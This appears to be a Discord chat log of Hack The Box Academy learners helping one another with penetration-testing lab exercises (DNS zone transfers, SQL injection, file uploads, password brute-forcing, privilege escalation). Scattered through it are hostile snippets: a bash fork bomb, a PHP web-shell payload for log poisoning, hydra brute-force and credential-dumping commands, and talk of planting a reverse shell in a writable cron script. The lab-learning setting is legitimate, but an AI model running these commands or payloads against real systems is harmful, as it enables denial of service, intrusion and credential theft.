#modules

Usually just opened new terminal and closed it via process

no it won't work

:(){ :|:& };:

looks sus

or you know, have a tmux script that grabs the pid of the process in the current pane and kills it

look like my rams enemy

its like the candy from a stranger, would you take it ?

There are two zones. Every of those contains an x amount of A records. Count them all together. Idk how else i can explain?

my ram say don't take candy from strangers

Guys if someone can give me an hit to find the first thing to do in this module... I searched in ALL PAGES a form to have a SQLi and nothing... I tried to stop my request with Burp and nothing... https://academy.hackthebox.com/module/58/section/534

add this to the end of your dig command | grep -E "\sA\s"

https://tenor.com/view/mindblown-explode-headshot-happytime-murders-happytime-murders-gifs-gif-11848020

Killer

wut is the first and wut is the second, am sorry my questions are dump

ok

your math is incorrect

the second zone has more records than 4 (which you got the max of 23 somehow)

you don't need to paste it here

i'm asking you to look at it and do it for the subdomain as well

then do the math

(also you can just add | wc -l to count it for you)

ok that started making sense

a + b

= c

that's your answer

inlanefreight.htb is a zone ?

yes

it's the root zone

Yep the main one. There exist another one where you found the TXT record iirc

is anyone interested in this theme i made it https://github.com/vadaysakiv/terminator-terminal-theme

also if you wanna paste large blocks of text, and images read and follow #welcome

Ackchyually its defined as X cuz we still dont know the result 🤓 ☝️

No
Root Zone is always .

yes sir

it's defined as whatever you wanna say the variable is

OMG THIS JUST MADE SENSE NOW

i.e. if you're dealing with right triangles, conventionally you'll use a, b, c

lol

yeah my bad i meant it's the base zone that exists on the nameserver

mericie have u compelted cpts path

pythagoras is fun, a^2 + b^2 = c^2

|| The only thing I am trying to find something is the payout function, I think it's this bc all the things are down else but I have nothing in burp suite 😭 || !!!

no

Yea so those two are zones.
All other are subdomains
Iirc

https://www.tecmint.com/wp-content/uploads/2016/05/DNS-Name-Resolution-Diagram.png

com zone?

inlanefreight.htb. is the base zone

X.com

yes like sites that are .com

ΔxΔp≥ 4π
h

its look sus

it's a tld

Top Level Domain is also a zone

each subdomain is a zone; some are overseen by different things

but how we made a sub domain a zone

subdomains are zones

and main domain is ?

inlanefreight.htb

subdomain.domain.tld

www.google.com

Thats configured by the admin. We cant make a zone by ourself if thats your question

Can someone help me please :(...

the result of the second zone is zero 🤓

nope

Also not mandatory.
A subdomain can also be a host address.
For example, a mail server
mail.example.com.

fair

it's just a mess of configuration

vHost stuff

yep, networking is important

weird now i can understand above chat🤓

Whats your command?

dig axfr @10.129.42.195 ns.inlanefreight.htb | grep -E "\sA\s" | wc -l

wrong subdomain

Wrong subdomain

thats wut i thought

it's the one that gave you the TXT record for one of the other questions

ns normally stands for nameserver and is therefore a host address

i gotta start taking notes of my answers

Wait whut? You dont do writeups for every question?

several of the questions have the right subdomain as part of their answer

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

note: i'm not even referencing my notes

i literally spun up pwnbox + target and ran the commands

and it worked, giving me the right answer

thought about that am gonna finish the modules and then get back and take notes

it's best to do it as you go

aka laziness

it helps reinforce knowledge

I usually take screenshot for every important step. In some a bit more even though process!

point it out if i am wrong , imagine i make website jojo now if i have to divide my website into subdomain acc to its need like admin , dev, webadmin then i make admin.jojo.com dev.jojo.com and webadmin.jojo.com and each subdomai have their own rights , workspace etc

Will bite you back immensly

OMG I GOT IT

love you guys so much

thnxx

||curl 'http://94.237.49.166:48210/cart.html'
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8'
-H 'Accept-Language: fr'
-H 'Cache-Control: max-age=0'
-H 'Connection: keep-alive'
-H 'If-Modified-Since: Mon, 28 Sep 2020 11:56:48 GMT'
-H 'If-None-Match: "3348-5b05e5c72e000-gzip"'
-H 'Sec-GPC: 1'
-H 'Upgrade-Insecure-Requests: 1'
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'
||
I don't understand what else I can do but there is nothing I can do here... ?
Only this button is sending something somewhere else, I tried to get the "result" for the ||checkout|| but I have only this type of request when I press the button :
||curl 'http://94.237.49.166:48210/checkout.html'
-H 'Referer: http://94.237.49.166:48210/cart.html'
-H 'Upgrade-Insecure-Requests: 1'
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'
--insecure ||

https://academy.hackthebox.com/module/58/section/534

great hope you learned something aswell

yes i did

but i still have a question

i uses to did it but its taking very long time and more work , i skipped doing that and reduces the amount of notes to very little notes

Either use Firefox, or format the curl command into one line.

how did we know that the second zone is the right subdomain ?

there like 19 subs

It's still working, just we have \.

When I use sqlmap it does the same.

What's the question you're on

Yes there are many subdomains but we cant axfr most of them. Only the main one and the one you found are basicly zones where we can use zone transfer. Or else an error will accour

huh

Yea well on easy ones i just put a screenshot in

if you're gonna use multiple lines, format by putting ``` above and below the code blocks

The last.

some guessing and some knowing basic networking

Ex:

https://tenor.com/view/drake-computer-notebook-explaning-gif-21152267

and luck ?

i meant pasting in discord

i mean basic networking gets most of the way there

localhost generally means it's on the same server

Im pretty sure you cant use axfr other subdomains. So you just need to find the ones where you can use it

Are there any other pages that may have an injection point if those aren't working?

Else it always sending # in the url.

yeah exactly

thank you so much

I read an arcticle from soneone bc I tried a lot of things and... they are saying it : ||Okay so, burpsuite, playing around with the shopping items and adding to cart registered the post request. Do the old save to a text file.||

thanks to all

i am pretty sure i have never saw this channel thi much active 3-4 months before

WAIT BRO I LL CRY !

FoxProxy was glitched.

get skill issued

"glitched" or wasn't set right

Bro I litterally clicked on ALL FKING ||articles|| in this site!

No, if it was enable and my burp suite off = strange things.

lol.I don't know why but...

I got a new thing.

LETS FKING GO !

More easier 🙂 xd.

nice job

Just to have results faster than default do there is something 🤔 ?

Just trying to look at DBs and taking a very long time...

do you still need help?

Bump 😄

yes please

what's the issue?

i also tried dumping SAM and get the local admin hash

nothing worked

try sekurlsa::logonPasswords if you get any different hashes.

i triedit

nono of the hashes worked

can you send me you output?

DM?

yes

ok

probably should delete those pics, but that is not the answer

it will accept the correct answer

?

I havent done it but like the 1337 is sticking out for me since well its a "meme number"/ number used in cybersec a lot.
Yoi sure its nothing there? Like i said i havent done it, cant help you other then what it looked a thorn in my eyes. I could be wrong

wdym?

they contain a spoiler

It's the reason why I set them as "spoiler"...

it's against tos to post it

that really doesn't mean much to mark them as spoiler

as anyone can still see them

He have to click on it to see, if he clicks it's because he wanted to see...

best practice, if you need to screenshot, is to redact anything that may be used

you should probably at least redact the flag using an image editor

Well ok...

or they can have that setting turned off

???

as spoiler text is a toggleable setting

you're posting spoilers for a skill assessment dude, just delete it

I am speaking about images.

its against the rules

you need to tune your attack

same thing applies

it's still a toggle setting

?

it means that not everyone has the setting turned on to have it revealed on click

and always show spoiler

really stupid imo but ok...

You're very close, but something is off. You can either infer what's wrong with the string, or you can tune your attack if there's something wrong with the data returned.

not really much more i can say

But I did not understand the "attack tuning" thing...

attack tuning = adjusting your attack to get the right answer

Yeah but.

They are speaking about "strings" titles etc.

And no examples or something to help what it does.

The only thing I know it that it's a ||Time based blind||.

File Upload Attacks: Type Filters
-I need some help on how to fuzz for the image/ part of this section, the course just skips over it like I already know it
-Am I trying to do the "Add&" for the image/ part? If so where does it go?

What? This section is talking about type filters, MIME and Content... you don't need to fuzz anything. It teaches you how to bypass those type filters.

Well I added two more args but I don't know what to add else like technique or dbms... I have "HUB" and no "HTB", I concluded it but why this? Is it normal 🤔?

Colleagues continue to ask the question: What is the FQDN of the host where the last octet ends with "x.x.x.203"? I'm digging up information but I'm still not succeeding I've done subdomain enumeration but I think I'm missing the correct word list DNS Footprinting Module

FQDN = Fully qualified domain name

WIth nslookup you can find it.

I need to know which image/ will work (jpg/jpeg/png/etc)

Gives me this step:

https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt

To reduce above wordlist:

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt

cat content-type.txt | grep 'image/' > image-content-types.txt (change the last .txt to new .txt)

There's a whole section on how to find that

each section builds on itself

So theres a section in Whitelist Filters using .php as the example, I'm just asking where do I go to fuzz the image/ in Content-Type
-like what part of the image/ do use the "ADD&" button on

the content-type section shows that in the screen shots

content-type is a header

ok let me read back through it, thanks

So marcie told you to use a "fierce" list. Meaninz your current wordlist didnt had enough. Maybe listing all the lists in that directory will help you find a fierce wordlist to use against the subdomain

either not enough or just different words entirely

dnsenum --dnsserver 10.129.81.137 --enum -p 0 -s 0 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt dev.inlanefreight.htb

take the word fierce to be more literal

we're telling you your wordlist is wrong, use a different one

also delete as it's a spoiler

for the propper subdomain

So reading through it and it just tells me to fuzz the Content-Type header:
-is this correct in burp Intruder to fuzz content-type?--> §Content-Type: image/§

are you asking or are you telling that you did it and it didn't work

load the wordlist and look at it

do first before asking

if your revised command doesn't work, then ask again

I'm not gonna tell you yes/no - or explicitly tell you that this is exactly the command you do - rather guide you to figure it out on your own

im so happy i found the answer

Delete both commands since they contain spoiler

please delete your commands you posted as they contain a spoiler for the answer

I see the wordlist is image/(content), so am I only to do §image/§ ? If so it has given nothing, all 188

but congrats

thanks

This one too and you good to go

and the ones posted in the #cpts channel

i already did

These types of questions are what really teach you how to understand the topic being discussed

i believe the hint even says the same thing "not all wordlists are the same"

if you want a more general tip: start small and go big

it's likely the subdomain exists within other wordlists as well

A real easy way to figure it out is to just try uploading a legitimate picture. See what types of pics you can upload, and when you find one capture that in burp.. and there you go.. you now have a file type template you can use to upload your exploits

thanks!

@ancient bane two things; i hope those 88 in your username are just coincidence and not something else and two don't DM without asking

Sorry

(for those curious, think about what the 8th letter of the English alphabet is)

H?

Yes

Im trying to wrap my head around this LOL. Im too tired i guess

Now think of what HH can mean (hint Germany 1942)

bro just made his account today too

Coincidence, I'll believe in - benefit of the doubt and all that

Hochwürdig************

He.. Hi..

OMG

Wow I really like your scope

But I didn't think of it in a such way

Yea idk how that flew above my head lol

I would really like to apologize for the Dm

Hochwürdiger Herr was my guess

You poor innocent soul

Either way. Cold dming is against server rules

I suggest reading those

Sure will do

hello, i have a question about kerberoasting that is bugging me: What accounts are kerberoastable? From what I understood you need the TGT of a user to ask for a TGS right?

Kerberoast targets acc that have service Principal name (SPN) associated with them

It enables us to request the TGS for that services which can later be cracked offline.

yoo whatsup guys, I had a question.

I spawned a target on Getting started module - Nibbles Enumeration. I needed to run nmap on it but pwnbox is 0/1, so I went to my kali virtual machine but there it doesnt work. Why is that?

can anyone help me out please

Here’s a great resource
https://adsecurity.org/?p=3458

Are you connected to the vpn?

Nope

Yes sir.

should I follow this for connecting to the VPN? https://academy.hackthebox.com/module/77/section/723

you need to download the academy vpn and connect to it to interact with that target

as it's on a private 10.129.x.x server

Yep you need the vpn

alright thank you so much guys, Imma do that

Ok, got it, SPN are records that links domain computers/users to a service. But imagine that we have an SPN for the user waldo for MSSQL/example.org. Is waldo kerberoastable? or do we need something before (like waldo's TGT)? How do we request a TGS for waldo ?

which module/section/question are you stuck on?

i bet your answer is in there

https://learn.microsoft.com/en-us/windows/win32/ad/service-principal-names

I'm just trying to understand the attack behind, not in a specific module/question (but currently doing Windows Attack & Defence)

I think this is happening because of bad internet connection right?

And there’s two links that was shared, kindly check them out.

Will do, thank you for the time 🙂

https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

Any idea how to specify a custom port with sqsh

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h```

according to the man pages -S server | host:port

though idk if it's running on a custom port

also remember that \ is an escape character in bash

so you may just need more or perhaps you can do .// and it'll just know

if someone know :>.

Are you still on the SQLMap thing?

Hmm, Thanks

tried it out, sqsh just seems to not work for this instance from what I also see on the fourms

did you alternatively try .\\\\?

You can DM me if you want

Yes, just a error with the server not being recognized with sqsh.

try with mssqlclient.py ¯_(ツ)_/¯

Doing that right now

mssqlclient.py -port 1433 htbdbuser@10.129.203.12
Seems to work while it doesn't seem to be the intended approach since it seems that I have to specify the domain and use windows-auth

While if I go with that approach with -windows-auth flag and specifying the domain

[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

Any ideas of what I should try

-windows-auth or --windows-auth i forget which

oh wait i just saw

i mean you can try adding the domain? aren't you given it?

Yeah, tried adding the domain WIN-02\htbdbuser

what about INLANEFREIGHT\htbdbuser?

$ mssqlclient.py -p 1433 Administrator@DC01 -windows-auth

INLANEFREIGHT isn't the domain in the module, its the "Attacking services" one with mssql

SQL (htbdbuser  guest@master)> enum_links
SRV_NAME              SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE        SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-------------------   ----------------   -----------   -------------------   ------------------   ------------   -------   
WINSRV02\SQLEXPRESS   SQLNCLI            SQL Server    WINSRV02\SQLEXPRESS   NULL                 NULL           NULL      

Linked Server   Local Login   Is Self Mapping   Remote Login  ````

or mssqlclient.py -p 1433 EXAMPLE/Administrator@DC01 -windows-auth

well there you have the name isn't WIN-02 either

Tried that one out also

on the easy pw lab, do you chunk up the pw.list or use the full thing? i mutated and got nothing. also reading on the forums to use the defualt lists not the mutated

Managed to use sqlcmd. Now trying the same approach

yes just the default.

Still don't have any permission to perform any of the actions shown in the guide

how long did it take you to get the pass? im BFing the secondary F service not the one indicated in the questions

it depends on the service you are attacking but it shouldn't take long

hmmm im attacking F not S

you can increase the threads to make it run faster

the assessment labs don't take too long when bruteforcing as compared to the ones in the section.

password attacks password mutations im stuck, rrann hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list to create new password list than ran hydra -l sam -P mut_password.list ssh://<ip> and nothing. there are 120k passwords and i got past the firrst 4k and nothing. anyone tell me if im doing thiss wrrong?

remove all with less than 10 chars

sed -ri '/^.{,9}$/d'

then take in the first 20k so head --20000 xx.list > 20k.list

sounds good

let me trry that, ill get back to you.

it will still take a bit at its 20k passwords

but use higher threads liek 48 or 64

also don't use --force, it can mess things up

this bf is annoying

i should go watch a show and wait for it to hit

well the mutated list shouldn't be 120k, it should be 94k

second: attack a different service

ssh is a slow service to brute with hydra and cme

eh telling them to narrow it down that specifically defeats (somewhat) the purpose

however cutting the first 17k lines is definitely helpful for massively speeding most of the rest of the module up

Anyone have done the Injection Attacks skill assessment? I can read the contents of passwd but I cannot find were the flag is located. Thanks in advance.

this may be dumb but is it in the filesystem root? /flag.txt?

Looks like is not there.

does the question tell you where it may be?

(i haven't done the module, but usually the questions give you a hint or place to look)

No hint. Just say Obtain the flag. Mmm maybe I am missing something dumb.

Thanks

np

sometimes the wording of questions can make you overthink

I lost 2 hours of my life to this earlier today 😂 😭

lmao look at their xbox tag

Gottem

I need assistance again with AD Enumeration & Attacks - Skills Assessment Part I. Can someone point me in the right direction so I can find information on MS01?

MS01 is the first windows host iirc

if you sign in to it and do hostname it should tell you

I am currently connected to the webshell still. Don't know where to find the first host.

ah right the first part is on WEB01

I would say get a pivot in place or once you extract and get some creds try to rdp with them onto the WEB01 host

I have not been able to use the creds I have found to connect to anything. Am I overthinking things?

well; i would suggest trying to upgrade your shell to a full one first

a powershell one-liner or something like that

@hexed spindle what information do you need specifically?

also from the webshell you can ping MS01

@hexed spindle I did this skill assessment today

and that should tell you the IP of the MS01 machine

I knew I was overthinking something. Did not know I could simply ping MS01.

@hexed spindle you have also nslookup

Thanks for the direction!

it's in the System's hosts file

you should also be able to ping the DC01 iirc

lots of different methods of finding

so i dont have to use the mutated list right

times are stable too

doesn't look stable; those first few pings show near 1k ping

what question?

thats normal with the connection tho

easy pw lab

sorry should have specified

oh. I don;t believe so? but I could be wrong

it's been a hot minute

just always enumerate to be sure that you can find users

the only thing open is ssh and ftp which is not anynmous

did you try CME with smb to check for Null sessions? (-u "" -p "")

ah i forget what all services are open on the host

yeah 21 and 22 w/o anonymous login

its a straight BF but the password wont pop

ah yeah

just gotta be patient

like how long lol

also 22 and 21 aren't the only one's open on that assessment

are you talking udp?

i just ran an nmap scan and found 7 services

oh wait

i'm stupid

on the EASY password lab?

i was looking at the wrong thing

you had me tr4iple looking

sec i thought i was in the password lab

i didn't use the mutated list

but I did use the provided user and password lists

once you get in; it's the easiest way to get to root from there

user is not smart and secure

i keeps ending

my network isnt that bad

try changing the vpn region

okay im done with hydra

imma cheat

not cheating if it works

but imo hydra>msf

i agree but im getting constant fails

its timing out and im not sure why its so spotty on it

your fails aren't due to hydra

ik they aren

it's your connection with the vpn

as I suggested, changing the vpn region may fix your woes

ive swapped between all 3

us regions

you can try the pwnbox as well. that way even if your connection to the site drops your instance is still chugging along

the only time I would really say to be that specific is if it's seeming like for w/e reason their command looks right but still isn't working

and usually it's the dreaded "you misspelled something" error

still going

positivity? how far down is it jeebus

they've stated they don't want people bruting for hours etc, so you probably have something off

i mean

you are using default threads

so it's gonna be a little slower

when i use t 48 or 64 it times out

did you change vpn regions and download a new vpn pack?

yes

but im honestly gonna blame my isp and apartment complex at this poinr

fair enough

i mean look at this... they have a funky network setup in an "internet ready" place

this is the WAN

i mean

that's really not funky

their public is routed thru their edge router, ran like 400ft and then into my router

looks like you're given the 10.1.22.0 subnet

which then nats to a 10.x.x internal

their edrouter is on 10.1.14

they have a different subnet for each unit

ye

that's not that odd

and makes sense, you don't want your neighbor to be able to peek at your stuff

no ur right, but the speeds are heavily diminished

and it makes port forwarding a mess

any site recommendations of indepth anatomy of hardware components

basic motherboard especially

if you read and follow #welcome there's a #hardware-iot-ics channel that you might be able to find some resources in

how to see the time of cronjobs , command didn't mentioned

https://crontab.guru/every-minute here's a site that's literally just showing different ways you'd write different things for Crontab

How do you find the ftp version in the footprinting module? I've tried nmap, and I've tried status but both answers are incorrect

connect directly

mearcie when do u sleep bruh

the version is shown in the connection banner

yes

no i meant how to see if anyfile is is running every specific time like what command

crontab -l iirc

It says its wrong again, I think its supposed to be a HTB banner or something

this doesn't give any output

you don't include the 220 response code

i used that

Alr that worked, thank you

when you view a crontab it should give you the timing of it

ig i don't know what you're trying to do

crontab -l <user> is how you view another user's crontab (but you'd need root)

ah

but if there's no crontabs set; then it's gonna be empty

so basically they tell backup.sh run everytime after 3 min but to know this u need sudo priv

if it's running with root privileges, yes

the crontab is run under the user's permissions

and generally the root user is gonna be the one running the backup

that make sense now , coz there is no cron for htb-student

which, as explained, is running in a misconfigured manner

as the backup script itself is world writeable

meaning that if you edit it, you can drop a revshell

and get root

that i know that its writable , but was wondering how to know if it was running 3 min or 3 hr

* * * * * <- this part is the timing

how to even get this output

when you view the crontab it shows you

the website i linked earlier shows them

https://crontab.guru/#*/3_*_*_*_*

its empty for htb-student and to view root we need sudo

crobtab guru my beloved

yes

what module/section are you on?

https://academy.hackthebox.com/module/51/section/469

it literally tells you a tool to use

you goon

i hate tools

well get used to them

becaues they're fuckin useful as fuck

it's literally right after that paragraph you're talking about

read the rest of the page before asking questions

ah bt not installed

then transfer the tool over

hmm 😔

https://tenor.com/view/brotherhood-thank-you-sorcery-fight-gif-21025139

i'm gonna be honest

reading really helps avoid confusion

btw the find command they give you to look for files is for world-writeable documents (o+w) file perms

hello i'm stuck in "Predictable Reset Token" question 1 : my script is launching but i don't got the right token

+/- 1 second iirc and the server time is in UTC

i try with tis site : https://www.epochconverter.com/

where are the resource files in the pwn box

im stll not pulling a password its timing out. im over my isp

can i dm you ?

no

you can right-click and copy the download link and paste in the pwnbox wget <paste>

i also add && unzip <filename>.zip if I know it's a zip file

oh i wasnt sure if i was able to. the last time my kali ip was the same as the pwn box

you can

also

if you're using the pwnbox, don't use the vpn

it WILL cause collision issues and break

how to i wget if i dont use my vpn

brother

the files are hosted publicly not privately

OH

i thought you meant

also if you're using the in-browser pwnbox: there's no need to use the vpn

yeah nevermind

Click Resources -> right-click download -> copy link

i dont use pwn box much

well well well , that tool also didn't tell time time for cron

so htb just wanted to help user that the backup.sh is running after evry 3 min but u can't find this info without sudo priv

yes but you can see it in pspy, that's how it works

Pspy doesn't read crontab, it's looking for new processes

why

just why

these bash historys are hilarious

Intro to Assembly Language - Data Movement-- "Add an instruction at the end of the attached code to move the value in "rsp" to "rax". What is the hex value of "rax" at the end of program execution? " Can anyone help me with this one? I see some posts from last year on it, but I am not seeing what anyone did to get the answer. I have tried redoing the last line in this everyway I can think of... ```
global _start

section .text
_start:
mov rax, 1024
mov rbx, 2048
xchg rax, rbx
push rbx
mov rax, rsp

the question asked to move the value in rsp, recall the difference between the pointer and the value itself

Yeah, so I honestly dont think I understand it right, but I tried doing move rax, [rsp] as well, and flipping it, rsp, rax and rsp, [rax]

move rsp, [rax] doesn't make any sense, rax is not a pointer

so if you have used move rax, [rsp] , what do you see in gdb for the value in rax?

it doesn't seem to finish the program going that route, hold on let me check it again, so I can give you the right value I see

have you tried that as the answer?

yes

what excatly did you enter as the answer

Hello, noob here. I am trying to count the number of installed packages. Using apt list --installed | wc -l getting wrong answer

yes

try again

make sure there's no space at the start or end

wc -l counts the line number, read the first few lines of the output to find out why the answer is wrong

wtf kinda of voodoo are you running here? it now works? I have tried that sooo many times 🤦‍♂️

maybe it was the cut and paste fail...

alright now let's delete the answer

copy and paste

Well, thanks a ton! I got a blinding headache earlier today trying to figure out where the issue was,

yeah just remember to check for extra spaces if you're sure the answer is right

I am going to type them out from now on for this section, I was damn sure I checked spaces, but regardless, I will take the win now!

thanks, got through it

hi im getting request validation failed when trying to start the pwnbox

okay this

this is what i wanted

THIS was a fun challenge

cant use my network to BF but i can use it to john some other stuff

Help pls 🙂
Introduction to bash scripting-Flow Control - Loops:
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

# Variables
var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"

# <- For-Loop here
for i in {1..28}
do
    var=$(echo "$var" | base64)

    if [[ i -eq 28 ]]
    then
        salt=$(( ${#var} + 1 ))
        echo $salt
    fi
done

# salt=$(( ${#var} + 1 ))
# echo $salt

# Check if $salt is empty
if [[ ! -z "$salt" ]]
then
    decrypt
    echo $flag
else
    exit 1
fi

I've tried many different things here including var=$(echo "$var" | wc -c), setting the salt outside of the loop, using wc -c on the salt and am consistently getting the same answer of 34071. I'm running it on the box but the answer is wrong. Help is appreciated.

if [[ i -eq 28 ]] shouldn't it be $i since it's a variable?

It gives the same result regardless, unfortunately. Tried that lol

anyways that's not the right bash syntax, if you want to use a variable, it should be $var

the number is correct, did you continue with the rest of the script?

That's the end of it unless I'm missing something?

what about the decrypt function?

The decrypt function was provided in the exercise script. I left it out for brevity

yes did you run that function as a part of your script

No, I assumed it only ran in the last if statement if the salt was empty. It would make sense to use it, I just assumed I didn't need to. The instructions weren't very clear.

if [[ ! -z "$salt" ]] means not empty

Oh, right. So then it is running.

send the entire output of the script here

34071
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
HTBL00p5r0x

the flag is right there

I'm a literal idiot 🤣 I thought it wanted the length

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

Thanks @next bronze Clearly it's time for bed lmao

have you completed the medium lab? can you help me out.

Instead of pinging someone from 10 days ago ask your question, there's plenty of people here that have done the content already

i am stuck at Password Attacks Lab - Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
i got the credentials for jason user and loggedin with ssh from there i am not able to find a way to privesc?
Thankyou for any hints!

what enumeration have you done at this point?

i have used sudo -l and checked the bash history nothing there, they are saying that there is a another user named Dennis i don't know how to get that user creds

Enumerate the internal services.

sudo -l is great for the htb machines, but cpts will require searching under every stone, only if there was an easy way to dig through a lot of information all tied up in one nice little script

Finally got through this. Number one thing I learned was that I need to seriously invest time into reverse engineering and how to find useful information in the source code of applications

I don't think it's necessary as far as pentesting is concerned, most of it is looking up CVEs that are available for the webapps or extensions for webapps

but anything helps i suppose.

anyone know why reverse shell no response?

it didn't connect

https://academy.hackthebox.com/module/143/section/1278

Hey guys, I encountered a problem, when I tried to pivot through ligolo, using bloodhound-python to extract domain related information, it could not be executed successfully, and the ligolo session automatically exited.

you done it, i'm stuck here

can i dm you please

you can upload bloodhound on the target machine and run it from there if i remmber correctly.

Is it possible to combine ligolo-ng and metasploit?

For example you want to run eternalblue Exploit on the internal hosts (1 hop).

Can you do that only with ligolo-ng and metasploit?

WINDOWS ATTACKS & DEFENSE - Coercing Attacks & Unconstrained Delegation
How i am suposed to perform the attack if the target machine is kali and i need windows?

You can use the kali machine to connect to the windows one

:/

guys sorry for stupid question, anyone know how to be able to type in HTB offtopic etc, why i can only type in htb academy chat in discord :/

If you didn't skip the onboarding you would know

Read the channels in the located in the server section

solved it, thanks, yeah mb XD

guys is it good to leanr hacking on wsl

or is it preferred to leanr hacking on a real linux operating system?

guys in intro to windows command line skill assessment last question how can i ssh to the domain controller ACADEMY -ICL-DC? where do i have the password?

please a hint

ACTIVE DIRECTORY ENUMERATION & ATTACKS - (Internal Password Spraying - from Windows)
" Organizations should also monitor event ID 4771: Kerberos pre-authentication failed, which may indicate an LDAP password spraying attempt. " Kerberos pre-authentication indicates LDAP password spraying attempt only if LDAP uses SASL authentication such as kerberos right? my understand is that kerberos is only used for authentication while LDAP is mainly used for querying directory service.

Any one available for a bit help for ODERN WEB EXPLOITATION TECHNIQUES -Exploiting XSS via WebSockets

https://academy.hackthebox.com/module/116/section/1512
The domain just isn't showing up on DNS Lookups even though I have added it to /etc/hosts
What I have tried adding to /etc/hosts

10.x.x.x inlanefreight.htb,ns1.inlanefreight.htb

└──╼ [★]$ dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
dig: couldn't get address for 'ns1.inlanefreight.htb': not found

fierce --domain inlanefreight.htb
NS: failure
SOA: failure
Failed to lookup NS/SOA, Domain does not exist

you will have to check the hint for this.

Hey guys,

in the skill assesment for file inclusion, ||every time i poison the logs the lab crashes.|| Any idea why?
||My useragent is: <?php system($_GET["cmd"]); ?>||
||Request: /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=pwd||

Hint just suggests subbrute while that is the tool to use, it requires the DNS resolving to the domain to be working

the comma is also not required.

in the /etc/hosts for the ns1 subdomain?

yeh, should be IP host host

Still isn't fixing it not being resolved,

└──╼ [★]$ nslookup inlanefreight.htb
Server:        1.1.1.1
Address:    1.1.1.1#53

** server can't find inlanefreight.htb: NXDOMAIN

Any other ideas?

try using nslookup inlanefreight.htb @10.10.10.10 (or whatever the machine Ip)

nvm got it...|| 'cmd' instead of "cmd"||...

└──╼ [★]$ nslookup inlanefreight.htb @10.129.230.13
nslookup: couldn't get address for '@10.129.230.13': not found

doesn't appear to be working, it shows up on nmap although

Is the domain included in the /etc/hosts ?

yes

└──╼ [★]$ tail -n 1 /etc/hosts
10.129.230.13 inlanefreight.htb ns1.inlanefreight.htb

try using the ns1.inlanefreight.htb domain

Server:        1.1.1.1
Address:    1.1.1.1#53

** server can't find ns1.inlanefreight.htb: NXDOMAIN

which module are you on?

https://academy.hackthebox.com/module/116/section/1512

could you ping inlanefreight.htb?

Somehow pinging works

ping inlanefreight.htb

Yeah, that's working.

idk whats happening

afaik htb is not an official TLD and so it cannot be resolved.

its a private network env.

shoudnt this work then?

But it has been added to the /etc/hosts to enable it being resolved

yes it should work.

The syntax is for dig not nslookup

wrong command.

oh ok

for dig.

import argparse, time, requests, os # imports four modules argparse (used for system arguments), time (used for time), requests (used for HTTP/HTTPs Requests), os (used for operating system commands)
parser = argparse.ArgumentParser(description="Interactive Web Shell for PoCs") # generates a variable called parser and uses argparse to create a description
parser.add_argument("-t", "--target", help="Specify the target host E.g. http://<TARGET IP>:3001/uploads/backdoor.php", required=True) # specifies flags such as -t for a target with a help and required option being true
parser.add_argument("-p", "--payload", help="Specify the reverse shell payload E.g. a python3 reverse shell. IP and Port required in the payload") # similar to above
parser.add_argument("-o", "--option", help="Interactive Web Shell with loop usage: python3 web_shell.py -t http://<TARGET IP>:3001/uploads/backdoor.php -o yes") # similar to above

Anyone have issues with the Hunting for Stuxbot Lab? I can’t do anything because elastic never loads any data
https://pastebin.com/Qtwh2nCc
that's the error it gives me

Managed to make it work by resetting the machine.

Now have another error

./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt 
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
Process lookup-3:
Traceback (most recent call last):
  File "/usr/lib/python3.9/multiprocessing/process.py", line 315, in _bootstrap
    self.run()
  File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 422, in run
    response = self.check(hostname, query_type, timeout_retries)
  File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 342, in check
    resp = self.resolver.query(host)
  File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 57, in query
    name_server = self.get_ns()
  File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 107, in get_ns
    ret = self.nameservers[self.pos]
IndexError: list index out of range

subbrute just keeps crashing even with the provided examples

add the IP to the resolver.txt file

Thanks, worked

I´ve got a question for the people who are doing the gamepwn module or are working with cheatengine. Do you run cheatengine in a windows vm or on your host system? I´m a little bit concerned because online you find a lot of articles of it beein malware or adware.

Just wanted to know, before buying the module.

cheatengine is not malware

can you elaborate a little bit and is it still wise to run it in a vm?

you can run it in a VM or on your machine, it doesn't matter. as for the course, i didn't take it so i don't know if they instruct you to use a VM or not. my guess is they do use a vm but i really have no idea. someone else can chime in on that. i'd wager they have a vm you connect to which already has cheatengine. regardless of that, cheatengine is perfectly safe and not malware.

Thanks for your input 🙂

Can someone assist with SocksOverRDP - Not sure how to get around the defender deleting my plugin.dll

Real-time protection

Yes, real-time is that what I need to research?

It's something that needs to be disabled as well

No defender =/= no protection

